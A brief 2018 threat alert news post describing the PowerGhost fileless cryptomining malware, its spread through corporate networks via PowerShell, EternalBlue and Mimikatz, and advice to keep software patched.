Print Page | Contact Us | Report Abuse | Sign In | Register
News & Press: Latest News

THREAT ALERS: FILELESS MALWARE TARGETING CORPORATE SYSTEMS

Friday, August 3, 2018   (0 Comments)
Posted by: Louise Haas
Share |

FILELESS MALWARE TARGETING
CORPORATE SYSTEMS

V

Threat actors are deploying a new fileless malware to target corporate networks across the world. Dubbed PowerGhost, the fileless malware is distributed by infecting a single system in a business network and then propagates to other computers and servers on the network via PowerShell, EternalBlue, and Mimikatz. Once infected, devices are used to mine cryptocurrency, allowing threat actors to make a quick profit as the number of infected devices increases. The infection process begins with the attacker deploying exploits or remote administration tools such as Windows Management Instrumentation. During the infection process, a one-line PowerShell script runs and downloads a cryptocurrency miner, Mimikatz, EternalBlue exploit shellcode, and a reflective PE injection module. Once one machine is infected, Mimikatz is used to collect account credentials from the current machine and works together with the EternalBlue exploit to propagate through the network and infect additional devices. The NJCCIC recommends users and administrators review SecureList’s blog post for more information and keep all software patched and up-to-date to prevent the exploitation of known vulnerabilities.